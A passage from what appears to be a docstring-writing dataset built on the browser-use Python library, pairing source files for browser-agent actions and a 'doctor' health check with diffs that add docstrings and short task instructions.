# skip actions with no filters, they are already included in the system prompt
continue
# Check domain filter
if self._match_domains(action.domains, page_url):
filtered_actions.append(action)
return '\n'.join(action.prompt_description() for action in filtered_actions)
class SpecialActionParameters(BaseModel):
model_config = ConfigDict(arbitrary_types_allowed=True)
# optional user-provided context object passed down from Agent(context=...)
# e.g. can contain anything, external db connections, file handles, queues, runtime config objects, etc.
# that you might want to be able to access quickly from within many of your actions
# browser-use code doesn't use this at all, we just pass it down to your actions for convenience
context: Any | None = None
# browser-use session object, can be used to create new tabs, navigate, access CDP
browser_session: BrowserSession | None = None
# Current page URL for filtering and context
page_url: str | None = None
# CDP client for direct Chrome DevTools Protocol access
cdp_client: Any | None = None # CDPClient type from cdp_use
# extra injected config if the action asks for these arg names
page_extraction_llm: BaseChatModel | None = None
file_system: FileSystem | None = None
available_file_paths: list[str] | None = None
has_sensitive_data: bool = False
extraction_schema: dict | None = None
@classmethod
def get_browser_requiring_params(cls) -> set[str]:
return {'browser_session', 'cdp_client', 'page_url'} | --- +++ @@ -12,6 +12,7 @@
class RegisteredAction(BaseModel):
+ """Model for a registered action"""
name: str
description: str
@@ -28,6 +29,7 @@ model_config = ConfigDict(arbitrary_types_allowed=True)
def prompt_description(self) -> str:
+ """Get a description of the action for the prompt in unstructured format"""
schema = self.param_model.model_json_schema()
params = []
@@ -55,6 +57,7 @@
class ActionModel(BaseModel):
+ """Base model for dynamically created action models"""
# this will have all the registered actions, e.g.
# click_element = param_model = ClickElementParams
@@ -63,6 +66,7 @@ model_config = ConfigDict(arbitrary_types_allowed=True, extra='forbid')
def get_index(self) -> int | None:
+ """Get the index of the action"""
# {'clicked_element': {'index':5}}
params = self.model_dump(exclude_unset=True).values()
if not params:
@@ -73,6 +77,7 @@ return None
def set_index(self, index: int):
+ """Overwrite the index of the action"""
# Get the action name and params
action_data = self.model_dump(exclude_unset=True)
action_name = next(iter(action_data.keys()))
@@ -84,11 +89,22 @@
class ActionRegistry(BaseModel):
+ """Model representing the action registry"""
actions: dict[str, RegisteredAction] = {}
@staticmethod
def _match_domains(domains: list[str] | None, url: str) -> bool:
+ """
+ Match a list of domain glob patterns against a URL.
+
+ Args:
+ domains: A list of domain patterns that can include glob patterns (* wildcard)
+ url: The URL to match against
+
+ Returns:
+ True if the URL's domain matches the pattern, False otherwise
+ """
if domains is None or not url:
return True
@@ -102,6 +118,16 @@ return False
def get_prompt_description(self, page_url: str | None = None) -> str:
+ """Get a description of all actions for the prompt
+
+ Args:
+ page_url: If provided, filter actions by URL using domain filters.
+
+ Returns:
+ A string description of available actions.
+ - If page is None: return only actions with no page_filter and no domains (for system prompt)
+ - If page is provided: return only filtered actions that match the current page (excluding unfiltered actions)
+ """
if page_url is None:
# For system prompt (no URL provided), include only actions with no filters
return '\n'.join(action.prompt_description() for action in self.actions.values() if action.domains is None)
@@ -121,6 +147,7 @@
class SpecialActionParameters(BaseModel):
+ """Model defining all special parameters that can be injected into actions"""
model_config = ConfigDict(arbitrary_types_allowed=True)
@@ -148,4 +175,5 @@
@classmethod
def get_browser_requiring_params(cls) -> set[str]:
- return {'browser_session', 'cdp_client', 'page_url'}+ """Get parameter names that require browser_session"""
+ return {'browser_session', 'cdp_client', 'page_url'}
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/tools/registry/views.py |
Add docstrings to meet PEP guidelines |
import logging
from typing import Any
logger = logging.getLogger(__name__)
COMMANDS = {'doctor'}
async def handle() -> dict[str, Any]:
checks: dict[str, dict[str, Any]] = {}
# 1. Package installation
checks['package'] = _check_package()
# 2. Browser availability
checks['browser'] = _check_browser()
# 3. API key configuration
checks['api_key'] = _check_api_key_config()
# 4. Cloudflared availability
checks['cloudflared'] = _check_cloudflared()
# 5. Network connectivity (basic check)
checks['network'] = await _check_network()
# Determine overall status
all_ok = all(check.get('status') == 'ok' for check in checks.values())
return {
'status': 'healthy' if all_ok else 'issues_found',
'checks': checks,
'summary': _summarize_checks(checks),
}
def _check_package() -> dict[str, Any]:
try:
import browser_use
version = getattr(browser_use, '__version__', 'unknown')
return {
'status': 'ok',
'message': f'browser-use {version}',
}
except ImportError:
return {
'status': 'error',
'message': 'browser-use not installed',
'fix': 'pip install browser-use',
}
def _check_browser() -> dict[str, Any]:
try:
from browser_use.browser.profile import BrowserProfile
# Just check if we can import and create a profile
profile = BrowserProfile(headless=True)
return {
'status': 'ok',
'message': 'Browser profile available',
}
except Exception as e:
return {
'status': 'warning',
'message': f'Browser may not be available: {e}',
'note': 'Will be installed on first use',
}
def _check_api_key_config() -> dict[str, Any]:
from browser_use.skill_cli.api_key import check_api_key
status = check_api_key()
if status['available']:
return {
'status': 'ok',
'message': f'API key configured ({status["source"]})',
}
else:
return {
'status': 'missing',
'message': 'No API key configured',
'note': 'Required for remote browser. Get one at https://browser-use.com/new-api-key',
}
def _check_cloudflared() -> dict[str, Any]:
from browser_use.skill_cli.tunnel import get_tunnel_manager
tunnel_mgr = get_tunnel_manager()
status_info = tunnel_mgr.get_status()
if status_info['available']:
return {
'status': 'ok',
'message': f'Cloudflared available ({status_info["source"]})',
'note': status_info.get('note'),
}
else:
return {
'status': 'missing',
'message': 'Cloudflared not available',
'note': 'Will be auto-installed on first tunnel use',
}
async def _check_network() -> dict[str, Any]:
try:
import httpx
async with httpx.AsyncClient(timeout=5.0) as client:
# Just ping a reliable endpoint
response = await client.head('https://api.github.com', follow_redirects=True)
if response.status_code < 500:
return {
'status': 'ok',
'message': 'Network connectivity OK',
}
except Exception as e:
logger.debug(f'Network check failed: {e}')
return {
'status': 'warning',
'message': 'Network connectivity check inconclusive',
'note': 'Some features may not work offline',
}
def _summarize_checks(checks: dict[str, dict[str, Any]]) -> str:
ok = sum(1 for c in checks.values() if c.get('status') == 'ok')
warning = sum(1 for c in checks.values() if c.get('status') == 'warning')
error = sum(1 for c in checks.values() if c.get('status') == 'error')
missing = sum(1 for c in checks.values() if c.get('status') == 'missing')
total = len(checks)
parts = [f'{ok}/{total} checks passed']
if warning > 0:
parts.append(f'{warning} warnings')
if error > 0:
parts.append(f'{error} errors')
if missing > 0:
parts.append(f'{missing} missing')
return ', '.join(parts) | --- +++ @@ -1,3 +1,8 @@+"""Doctor command - check installation and dependencies.
+
+Validates that browser-use is properly installed and all dependencies
+are available. Provides helpful diagnostic information and fixes.
+"""
import logging
from typing import Any
@@ -8,6 +13,7 @@
async def handle() -> dict[str, Any]:
+ """Run health checks and return results."""
checks: dict[str, dict[str, Any]] = {}
# 1. Package installation
@@ -36,6 +42,7 @@
def _check_package() -> dict[str, Any]:
+ """Check if browser-use is installed."""
try:
import browser_use
@@ -53,6 +60,7 @@
def _check_browser() -> dict[str, Any]:
+ """Check if browser is available."""
try:
from browser_use.browser.profile import BrowserProfile
@@ -71,6 +79,7 @@
def _check_api_key_config() -> dict[str, Any]:
+ """Check if API key is configured."""
from browser_use.skill_cli.api_key import check_api_key
status = check_api_key()
@@ -88,6 +97,7 @@
def _check_cloudflared() -> dict[str, Any]:
+ """Check if cloudflared is available."""
from browser_use.skill_cli.tunnel import get_tunnel_manager
tunnel_mgr = get_tunnel_manager()
@@ -108,6 +118,7 @@
async def _check_network() -> dict[str, Any]:
+ """Check basic network connectivity."""
try:
import httpx
@@ -130,6 +141,7 @@
def _summarize_checks(checks: dict[str, dict[str, Any]]) -> str:
+ """Generate a summary of check results."""
ok = sum(1 for c in checks.values() if c.get('status') == 'ok')
warning = sum(1 for c in checks.values() if c.get('status') == 'warning')
error = sum(1 for c in checks.values() if c.get('status') == 'error')
@@ -145,4 +157,4 @@ if missing > 0:
parts.append(f'{missing} missing')
- return ', '.join(parts)+ return ', '.join(parts)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/doctor.py |
Add docstrings to improve collaboration | import asyncio
import json
import logging
import os
from typing import Generic, TypeVar
import anyio
try:
from lmnr import Laminar # type: ignore
except ImportError:
Laminar = None # type: ignore
from pydantic import BaseModel
from browser_use.agent.views import ActionModel, ActionResult
from browser_use.browser import BrowserSession
from browser_use.browser.events import (
ClickCoordinateEvent,
ClickElementEvent,
CloseTabEvent,
GetDropdownOptionsEvent,
GoBackEvent,
NavigateToUrlEvent,
ScrollEvent,
ScrollToTextEvent,
SendKeysEvent,
SwitchTabEvent,
TypeTextEvent,
UploadFileEvent,
)
from browser_use.browser.views import BrowserError
from browser_use.dom.service import EnhancedDOMTreeNode
from browser_use.filesystem.file_system import FileSystem
from browser_use.llm.base import BaseChatModel
from browser_use.llm.messages import SystemMessage, UserMessage
from browser_use.observability import observe_debug
from browser_use.tools.registry.service import Registry
from browser_use.tools.utils import get_click_description
from browser_use.tools.views import (
ClickElementAction,
ClickElementActionIndexOnly,
CloseTabAction,
DoneAction,
ExtractAction,
FindElementsAction,
GetDropdownOptionsAction,
InputTextAction,
NavigateAction,
NoParamsAction,
SaveAsPdfAction,
ScreenshotAction,
ScrollAction,
SearchAction,
SearchPageAction,
SelectDropdownOptionAction,
SendKeysAction,
StructuredOutputAction,
SwitchTabAction,
UploadFileAction,
)
from browser_use.utils import create_task_with_error_handling, sanitize_surrogates, time_execution_sync
logger = logging.getLogger(__name__)
# Import EnhancedDOMTreeNode and rebuild event models that have forward references to it
# This must be done after all imports are complete
ClickElementEvent.model_rebuild()
TypeTextEvent.model_rebuild()
ScrollEvent.model_rebuild()
UploadFileEvent.model_rebuild()
Context = TypeVar('Context')
T = TypeVar('T', bound=BaseModel)
def _detect_sensitive_key_name(text: str, sensitive_data: dict[str, str | dict[str, str]] | None) -> str | None:
if not sensitive_data or not text:
return None
# Collect all sensitive values and their keys
for domain_or_key, content in sensitive_data.items():
if isinstance(content, dict):
# New format: {domain: {key: value}}
for key, value in content.items():
if value and value == text:
return key
elif content: # Old format: {key: value}
if content == text:
return domain_or_key
return None
def handle_browser_error(e: BrowserError) -> ActionResult:
if e.long_term_memory is not None:
if e.short_term_memory is not None:
return ActionResult(
extracted_content=e.short_term_memory, error=e.long_term_memory, include_extracted_content_only_once=True
)
else:
return ActionResult(error=e.long_term_memory)
# Fallback to original error handling if long_term_memory is None
logger.warning(
'⚠️ A BrowserError was raised without long_term_memory - always set long_term_memory when raising BrowserError to propagate right messages to LLM.'
)
raise e
# --- JS templates for search_page and find_elements ---
_SEARCH_PAGE_JS_BODY = """\
try {
var scope = CSS_SCOPE ? document.querySelector(CSS_SCOPE) : document.body;
if (!scope) {
return {error: 'CSS scope selector not found: ' + CSS_SCOPE, matches: [], total: 0};
}
var walker = document.createTreeWalker(scope, NodeFilter.SHOW_TEXT);
var fullText = '';
var nodeOffsets = [];
while (walker.nextNode()) {
var node = walker.currentNode;
var text = node.textContent;
if (text && text.trim()) {
nodeOffsets.push({offset: fullText.length, length: text.length, node: node});
fullText += text;
}
}
var re;
try {
var flags = CASE_SENSITIVE ? 'g' : 'gi';
if (IS_REGEX) {
re = new RegExp(PATTERN, flags);
} else {
re = new RegExp(PATTERN.replace(/[.*+?^${}()|[\\]\\\\]/g, '\\\\$&'), flags);
}
} catch (e) {
return {error: 'Invalid regex pattern: ' + e.message, matches: [], total: 0};
}
var matches = [];
var match;
var totalFound = 0;
while ((match = re.exec(fullText)) !== null) {
totalFound++;
if (matches.length < MAX_RESULTS) {
var start = Math.max(0, match.index - CONTEXT_CHARS);
var end = Math.min(fullText.length, match.index + match[0].length + CONTEXT_CHARS);
var context = fullText.slice(start, end);
var elementPath = '';
for (var i = 0; i < nodeOffsets.length; i++) {
var no = nodeOffsets[i];
if (no.offset <= match.index && no.offset + no.length > match.index) {
elementPath = _getPath(no.node.parentElement);
break;
}
}
matches.push({
match_text: match[0],
context: (start > 0 ? '...' : '') + context + (end < fullText.length ? '...' : ''),
element_path: elementPath,
char_position: match.index
});
}
if (match[0].length === 0) re.lastIndex++;
}
return {matches: matches, total: totalFound, has_more: totalFound > MAX_RESULTS};
} catch (e) {
return {error: 'search_page error: ' + e.message, matches: [], total: 0};
}
function _getPath(el) {
var parts = [];
var current = el;
while (current && current !== document.body && current !== document) {
var desc = current.tagName ? current.tagName.toLowerCase() : '';
if (!desc) break;
if (current.id) desc += '#' + current.id;
else if (current.className && typeof current.className === 'string') {
var classes = current.className.trim().split(/\\s+/).slice(0, 2).join('.');
if (classes) desc += '.' + classes;
}
parts.unshift(desc);
current = current.parentElement;
}
return parts.join(' > ');
}
"""
_FIND_ELEMENTS_JS_BODY = """\
try {
var elements;
try {
elements = document.querySelectorAll(SELECTOR);
} catch (e) {
return {error: 'Invalid CSS selector: ' + e.message, elements: [], total: 0};
}
var total = elements.length;
var limit = Math.min(total, MAX_RESULTS);
var results = [];
for (var i = 0; i < limit; i++) {
var el = elements[i];
var item = {index: i, tag: el.tagName.toLowerCase()};
if (INCLUDE_TEXT) {
var text = (el.textContent || '').trim();
item.text = text.length > 300 ? text.slice(0, 300) + '...' : text;
}
if (ATTRIBUTES && ATTRIBUTES.length > 0) {
item.attrs = {};
for (var j = 0; j < ATTRIBUTES.length; j++) {
var val = el.getAttribute(ATTRIBUTES[j]);
if (val !== null) {
item.attrs[ATTRIBUTES[j]] = val.length > 500 ? val.slice(0, 500) + '...' : val;
}
}
}
item.children_count = el.children.length;
results.push(item);
}
return {elements: results, total: total, showing: limit};
} catch (e) {
return {error: 'find_elements error: ' + e.message, elements: [], total: 0};
}
"""
def _build_search_page_js(
pattern: str,
regex: bool,
case_sensitive: bool,
context_chars: int,
css_scope: str | None,
max_results: int,
) -> str:
params_js = (
f'var PATTERN = {json.dumps(pattern)};\n'
f'var IS_REGEX = {json.dumps(regex)};\n'
f'var CASE_SENSITIVE = {json.dumps(case_sensitive)};\n'
f'var CONTEXT_CHARS = {json.dumps(context_chars)};\n'
f'var CSS_SCOPE = {json.dumps(css_scope)};\n'
f'var MAX_RESULTS = {json.dumps(max_results)};\n'
)
return '(function() {\n' + params_js + _SEARCH_PAGE_JS_BODY + '\n})()'
def _build_find_elements_js(
selector: str,
attributes: list[str] | None,
max_results: int,
include_text: bool,
) -> str:
params_js = (
f'var SELECTOR = {json.dumps(selector)};\n'
f'var ATTRIBUTES = {json.dumps(attributes)};\n'
f'var MAX_RESULTS = {json.dumps(max_results)};\n'
f'var INCLUDE_TEXT = {json.dumps(include_text)};\n'
)
return '(function() {\n' + params_js + _FIND_ELEMENTS_JS_BODY + '\n})()'
def _format_search_results(data: dict, pattern: str) -> str:
if not isinstance(data, dict):
return f'search_page returned unexpected result: {data}'
matches = data.get('matches', [])
total = data.get('total', 0)
has_more = data.get('has_more', False)
if total == 0:
return f'No matches found for "{pattern}" on page.'
lines = [f'Found {total} match{"es" if total != 1 else ""} for "{pattern}" on page:']
lines.append('')
for i, m in enumerate(matches):
context = m.get('context', '')
path = m.get('element_path', '')
loc = f' (in {path})' if path else ''
lines.append(f'[{i + 1}] {context}{loc}')
if has_more:
lines.append(f'\n... showing {len(matches)} of {total} total matches. Increase max_results to see more.')
return '\n'.join(lines)
def _format_find_results(data: dict, selector: str) -> str:
if not isinstance(data, dict):
return f'find_elements returned unexpected result: {data}'
elements = data.get('elements', [])
total = data.get('total', 0)
showing = data.get('showing', 0)
if total == 0:
return f'No elements found matching "{selector}".'
lines = [f'Found {total} element{"s" if total != 1 else ""} matching "{selector}":']
lines.append('')
for el in elements:
idx = el.get('index', 0)
tag = el.get('tag', '?')
text = el.get('text', '')
attrs = el.get('attrs', {})
children = el.get('children_count', 0)
# Build element description
parts = [f'[{idx}] <{tag}>']
if text:
# Collapse whitespace for readability
display_text = ' '.join(text.split())
if len(display_text) > 120:
display_text = display_text[:120] + '...'
parts.append(f'"{display_text}"')
if attrs:
attr_strs = [f'{k}="{v}"' for k, v in attrs.items()]
parts.append('{' + ', '.join(attr_strs) + '}')
parts.append(f'({children} children)')
lines.append(' '.join(parts))
if showing < total:
lines.append(f'\nShowing {showing} of {total} total elements. Increase max_results to see more.')
return '\n'.join(lines)
def _is_autocomplete_field(node: EnhancedDOMTreeNode) -> bool:
attrs = node.attributes or {}
if attrs.get('role') == 'combobox':
return True
aria_ac = attrs.get('aria-autocomplete', '')
if aria_ac and aria_ac != 'none':
return True
if attrs.get('list'):
return True
haspopup = attrs.get('aria-haspopup', '')
if haspopup and haspopup != 'false' and (attrs.get('aria-controls') or attrs.get('aria-owns')):
return True
return False
class Tools(Generic[Context]):
def __init__(
self,
exclude_actions: list[str] | None = None,
output_model: type[T] | None = None,
display_files_in_done_text: bool = True,
):
self.registry = Registry[Context](exclude_actions if exclude_actions is not None else [])
self.display_files_in_done_text = display_files_in_done_text
self._output_model: type[BaseModel] | None = output_model
self._coordinate_clicking_enabled: bool = False
"""Register all default browser actions"""
self._register_done_action(output_model)
# Basic Navigation Actions
@self.registry.action(
'',
param_model=SearchAction,
terminates_sequence=True,
)
async def search(params: SearchAction, browser_session: BrowserSession):
import urllib.parse
# Encode query for URL safety
encoded_query = urllib.parse.quote_plus(params.query)
# Build search URL based on search engine
search_engines = {
'duckduckgo': f'https://duckduckgo.com/?q={encoded_query}',
'google': f'https://www.google.com/search?q={encoded_query}&udm=14',
'bing': f'https://www.bing.com/search?q={encoded_query}',
}
if params.engine.lower() not in search_engines:
return ActionResult(error=f'Unsupported search engine: {params.engine}. Options: duckduckgo, google, bing')
search_url = search_engines[params.engine.lower()]
# Simple tab logic: use current tab by default
use_new_tab = False
# Dispatch navigation event
try:
event = browser_session.event_bus.dispatch(
NavigateToUrlEvent(
url=search_url,
new_tab=use_new_tab,
)
)
await event
await event.event_result(raise_if_any=True, raise_if_none=False)
memory = f"Searched {params.engine.title()} for '{params.query}'"
msg = f'🔍 {memory}'
logger.info(msg)
return ActionResult(extracted_content=memory, long_term_memory=memory)
except Exception as e:
logger.error(f'Failed to search {params.engine}: {e}')
return ActionResult(error=f'Failed to search {params.engine} for "{params.query}": {str(e)}')
@self.registry.action(
'',
param_model=NavigateAction,
terminates_sequence=True,
)
async def navigate(params: NavigateAction, browser_session: BrowserSession):
try:
# Dispatch navigation event
event = browser_session.event_bus.dispatch(NavigateToUrlEvent(url=params.url, new_tab=params.new_tab))
await event
await event.event_result(raise_if_any=True, raise_if_none=False)
# Health check: detect empty DOM for http/https pages and retry once
if not params.new_tab:
state = await browser_session.get_browser_state_summary(include_screenshot=False)
url_is_http = state.url.lower().startswith(('http://', 'https://'))
if url_is_http and state.dom_state._root is None:
browser_session.logger.warning(
f'⚠️ Empty DOM detected after navigation to {params.url}, waiting 3s and rechecking...'
)
await asyncio.sleep(3.0)
state = await browser_session.get_browser_state_summary(include_screenshot=False)
if state.url.lower().startswith(('http://', 'https://')) and state.dom_state._root is None:
return ActionResult(
error=f'Page loaded but returned empty content for {params.url}. '
f'The page may require JavaScript that failed to render, use anti-bot measures, '
f'or have a connection issue (e.g. tunnel/proxy error). Try a different URL or approach.'
)
if params.new_tab:
memory = f'Opened new tab with URL {params.url}'
msg = f'🔗 Opened new tab with url {params.url}'
else:
memory = f'Navigated to {params.url}'
msg = f'🔗 {memory}'
logger.info(msg)
return ActionResult(extracted_content=msg, long_term_memory=memory)
except Exception as e:
error_msg = str(e)
# Always log the actual error first for debugging
browser_session.logger.error(f'❌ Navigation failed: {error_msg}')
# Check if it's specifically a RuntimeError about CDP client
if isinstance(e, RuntimeError) and 'CDP client not initialized' in error_msg:
browser_session.logger.error('❌ Browser connection failed - CDP client not properly initialized')
return ActionResult(error=f'Browser connection error: {error_msg}')
# Check for network-related errors
elif any(
err in error_msg
for err in [
'ERR_NAME_NOT_RESOLVED',
'ERR_INTERNET_DISCONNECTED',
'ERR_CONNECTION_REFUSED',
'ERR_TIMED_OUT',
'ERR_TUNNEL_CONNECTION_FAILED',
'net::',
]
):
site_unavailable_msg = f'Navigation failed - site unavailable: {params.url}'
browser_session.logger.warning(f'⚠️ {site_unavailable_msg} - {error_msg}')
return ActionResult(error=site_unavailable_msg)
else:
# Return error in ActionResult instead of re-raising
return ActionResult(error=f'Navigation failed: {str(e)}')
@self.registry.action('Go back', param_model=NoParamsAction, terminates_sequence=True)
async def go_back(_: NoParamsAction, browser_session: BrowserSession):
try:
event = browser_session.event_bus.dispatch(GoBackEvent())
await event
memory = 'Navigated back'
msg = f'🔙 {memory}'
logger.info(msg)
return ActionResult(extracted_content=memory)
except Exception as e:
logger.error(f'Failed to dispatch GoBackEvent: {type(e).__name__}: {e}')
error_msg = f'Failed to go back: {str(e)}'
return ActionResult(error=error_msg)
@self.registry.action('Wait for x seconds.')
async def wait(seconds: int = 3):
# Cap wait time at maximum 30 seconds
# Reduce the wait time by 3 seconds to account for the llm call which takes at least 3 seconds
# So if the model decides to wait for 5 seconds, the llm call took at least 3 seconds, so we only need to wait for 2 seconds
# Note by Mert: the above doesnt make sense because we do the LLM call right after this or this could be followed by another action after which we would like to wait
# so I revert this.
actual_seconds = min(max(seconds - 1, 0), 30)
memory = f'Waited for {seconds} seconds'
logger.info(f'🕒 waited for {seconds} second{"" if seconds == 1 else "s"}')
await asyncio.sleep(actual_seconds)
return ActionResult(extracted_content=memory, long_term_memory=memory)
# Helper function for coordinate conversion
def _convert_llm_coordinates_to_viewport(llm_x: int, llm_y: int, browser_session: BrowserSession) -> tuple[int, int]:
if browser_session.llm_screenshot_size and browser_session._original_viewport_size:
original_width, original_height = browser_session._original_viewport_size
llm_width, llm_height = browser_session.llm_screenshot_size
# Convert coordinates using fractions
actual_x = int((llm_x / llm_width) * original_width)
actual_y = int((llm_y / llm_height) * original_height)
logger.info(
f'🔄 Converting coordinates: LLM ({llm_x}, {llm_y}) @ {llm_width}x{llm_height} '
f'→ Viewport ({actual_x}, {actual_y}) @ {original_width}x{original_height}'
)
return actual_x, actual_y
return llm_x, llm_y
# Element Interaction Actions
async def _detect_new_tab_opened(
browser_session: BrowserSession,
tabs_before: set[str],
) -> str:
try:
# Brief delay to allow CDP Target.attachedToTarget events to propagate
# and be processed by SessionManager._handle_target_attached
await asyncio.sleep(0.05)
tabs_after = await browser_session.get_tabs()
new_tabs = [t for t in tabs_after if t.target_id not in tabs_before]
if new_tabs:
new_tab_id = new_tabs[0].target_id[-4:]
return f'. Note: This opened a new tab (tab_id: {new_tab_id}) - switch to it if you need to interact with the new page.'
except Exception:
pass
return ''
async def _click_by_coordinate(params: ClickElementAction, browser_session: BrowserSession) -> ActionResult:
# Ensure coordinates are provided (type safety)
if params.coordinate_x is None or params.coordinate_y is None:
return ActionResult(error='Both coordinate_x and coordinate_y must be provided')
try:
# Convert coordinates from LLM size to original viewport size if resizing was used
actual_x, actual_y = _convert_llm_coordinates_to_viewport(
params.coordinate_x, params.coordinate_y, browser_session
)
# Capture tab IDs before click to detect new tabs
tabs_before = {t.target_id for t in await browser_session.get_tabs()}
# Highlight the coordinate being clicked (truly non-blocking)
asyncio.create_task(browser_session.highlight_coordinate_click(actual_x, actual_y))
# Dispatch ClickCoordinateEvent - handler will check for safety and click
event = browser_session.event_bus.dispatch(
ClickCoordinateEvent(coordinate_x=actual_x, coordinate_y=actual_y, force=True)
)
await event
# Wait for handler to complete and get any exception or metadata
click_metadata = await event.event_result(raise_if_any=True, raise_if_none=False)
# Check for validation errors (only happens when force=False)
if isinstance(click_metadata, dict) and 'validation_error' in click_metadata:
error_msg = click_metadata['validation_error']
return ActionResult(error=error_msg)
memory = f'Clicked on coordinate {params.coordinate_x}, {params.coordinate_y}'
memory += await _detect_new_tab_opened(browser_session, tabs_before)
logger.info(f'🖱️ {memory}')
return ActionResult(
extracted_content=memory,
metadata={'click_x': actual_x, 'click_y': actual_y},
)
except BrowserError as e:
return handle_browser_error(e)
except Exception as e:
error_msg = f'Failed to click at coordinates ({params.coordinate_x}, {params.coordinate_y}).'
return ActionResult(error=error_msg)
async def _click_by_index(
params: ClickElementAction | ClickElementActionIndexOnly, browser_session: BrowserSession
) -> ActionResult:
assert params.index is not None
try:
assert params.index != 0, (
'Cannot click on element with index 0. If there are no interactive elements use wait(), refresh(), etc. to troubleshoot'
)
# Look up the node from the selector map
node = await browser_session.get_element_by_index(params.index)
if node is None:
msg = f'Element index {params.index} not available - page may have changed. Try refreshing browser state.'
logger.warning(f'⚠️ {msg}')
return ActionResult(extracted_content=msg)
# Get description of clicked element
element_desc = get_click_description(node)
# Capture tab IDs before click to detect new tabs
tabs_before = {t.target_id for t in await browser_session.get_tabs()}
# Highlight the element being clicked (truly non-blocking)
create_task_with_error_handling(
browser_session.highlight_interaction_element(node), name='highlight_click_element', suppress_exceptions=True
)
event = browser_session.event_bus.dispatch(ClickElementEvent(node=node))
await event
# Wait for handler to complete and get any exception or metadata
click_metadata = await event.event_result(raise_if_any=True, raise_if_none=False)
# Check if result contains validation error (e.g., trying to click <select> or file input)
if isinstance(click_metadata, dict) and 'validation_error' in click_metadata:
error_msg = click_metadata['validation_error']
# If it's a select element, try to get dropdown options as a helpful shortcut
if 'Cannot click on <select> elements.' in error_msg:
try:
return await dropdown_options(
params=GetDropdownOptionsAction(index=params.index), browser_session=browser_session
)
except Exception as dropdown_error:
logger.debug(
f'Failed to get dropdown options as shortcut during click on dropdown: {type(dropdown_error).__name__}: {dropdown_error}'
)
return ActionResult(error=error_msg)
# Build memory with element info
memory = f'Clicked {element_desc}'
memory += await _detect_new_tab_opened(browser_session, tabs_before)
logger.info(f'🖱️ {memory}')
# Include click coordinates in metadata if available
return ActionResult(
extracted_content=memory,
metadata=click_metadata if isinstance(click_metadata, dict) else None,
)
except BrowserError as e:
return handle_browser_error(e)
except Exception as e:
error_msg = f'Failed to click element {params.index}: {str(e)}'
return ActionResult(error=error_msg)
# Store click handlers for re-registration
self._click_by_index = _click_by_index
self._click_by_coordinate = _click_by_coordinate
# Register click action (index-only by default)
self._register_click_action()
@self.registry.action(
'Input text into element by index.',
param_model=InputTextAction,
)
async def input(
params: InputTextAction,
browser_session: BrowserSession,
has_sensitive_data: bool = False,
sensitive_data: dict[str, str | dict[str, str]] | None = None,
):
# Look up the node from the selector map
node = await browser_session.get_element_by_index(params.index)
if node is None:
msg = f'Element index {params.index} not available - page may have changed. Try refreshing browser state.'
logger.warning(f'⚠️ {msg}')
return ActionResult(extracted_content=msg)
# Highlight the element being typed into (truly non-blocking)
create_task_with_error_handling(
browser_session.highlight_interaction_element(node), name='highlight_type_element', suppress_exceptions=True
)
# Dispatch type text event with node
try:
# Detect which sensitive key is being used
sensitive_key_name = None
if has_sensitive_data and sensitive_data:
sensitive_key_name = _detect_sensitive_key_name(params.text, sensitive_data)
event = browser_session.event_bus.dispatch(
TypeTextEvent(
node=node,
text=params.text,
clear=params.clear,
is_sensitive=has_sensitive_data,
sensitive_key_name=sensitive_key_name,
)
)
await event
input_metadata = await event.event_result(raise_if_any=True, raise_if_none=False)
# Create message with sensitive data handling
if has_sensitive_data:
if sensitive_key_name:
msg = f'Typed {sensitive_key_name}'
log_msg = f'Typed <{sensitive_key_name}>'
else:
msg = 'Typed sensitive data'
log_msg = 'Typed <sensitive>'
else:
msg = f"Typed '{params.text}'"
log_msg = f"Typed '{params.text}'"
logger.debug(log_msg)
# Check for value mismatch (non-sensitive only)
actual_value = None
if isinstance(input_metadata, dict):
actual_value = input_metadata.pop('actual_value', None)
if not has_sensitive_data and actual_value is not None and actual_value != params.text:
msg += f"\n⚠️ Note: the field's actual value '{actual_value}' differs from typed text '{params.text}'. The page may have reformatted or autocompleted your input."
# Check for autocomplete/combobox field — add mechanical delay for dropdown
if _is_autocomplete_field(node):
msg += '\n💡 This is an autocomplete field. Wait for suggestions to appear, then click the correct suggestion instead of pressing Enter.'
# Only delay for true JS-driven autocomplete (combobox / aria-autocomplete),
# not native <datalist> or loose aria-haspopup which the browser handles instantly
attrs = node.attributes or {}
if attrs.get('role') == 'combobox' or (attrs.get('aria-autocomplete', '') not in ('', 'none')):
await asyncio.sleep(0.4) # let JS dropdown populate before next action
# Include input coordinates in metadata if available
return ActionResult(
extracted_content=msg,
long_term_memory=msg,
metadata=input_metadata if isinstance(input_metadata, dict) else None,
)
except BrowserError as e:
return handle_browser_error(e)
except Exception as e:
# Log the full error for debugging
logger.error(f'Failed to dispatch TypeTextEvent: {type(e).__name__}: {e}')
error_msg = f'Failed to type text into element {params.index}: {e}'
return ActionResult(error=error_msg)
@self.registry.action(
'',
param_model=UploadFileAction,
)
async def upload_file(
params: UploadFileAction, browser_session: BrowserSession, available_file_paths: list[str], file_system: FileSystem
):
# Check if file is in available_file_paths (user-provided or downloaded files)
# For remote browsers (is_local=False), we allow absolute remote paths even if not tracked locally
if params.path not in available_file_paths:
# Also check if it's a recently downloaded file that might not be in available_file_paths yet
downloaded_files = browser_session.downloaded_files
if params.path not in downloaded_files:
# Finally, check if it's a file in the FileSystem service
if file_system and file_system.get_dir():
# Check if the file is actually managed by the FileSystem service
# The path should be just the filename for FileSystem files
file_obj = file_system.get_file(params.path)
if file_obj:
# File is managed by FileSystem, construct the full path
file_system_path = str(file_system.get_dir() / params.path)
params = UploadFileAction(index=params.index, path=file_system_path)
else:
# If browser is remote, allow passing a remote-accessible absolute path
if not browser_session.is_local:
pass
else:
msg = f'File path {params.path} is not available. To fix: The user must add this file path to the available_file_paths parameter when creating the Agent. Example: Agent(task="...", llm=llm, browser=browser, available_file_paths=["{params.path}"])'
logger.error(f'❌ {msg}')
return ActionResult(error=msg)
else:
# If browser is remote, allow passing a remote-accessible absolute path
if not browser_session.is_local:
pass
else:
msg = f'File path {params.path} is not available. To fix: The user must add this file path to the available_file_paths parameter when creating the Agent. Example: Agent(task="...", llm=llm, browser=browser, available_file_paths=["{params.path}"])'
raise BrowserError(message=msg, long_term_memory=msg)
# For local browsers, ensure the file exists and has content
if browser_session.is_local:
if not os.path.exists(params.path):
msg = f'File {params.path} does not exist'
return ActionResult(error=msg)
file_size = os.path.getsize(params.path)
if file_size == 0:
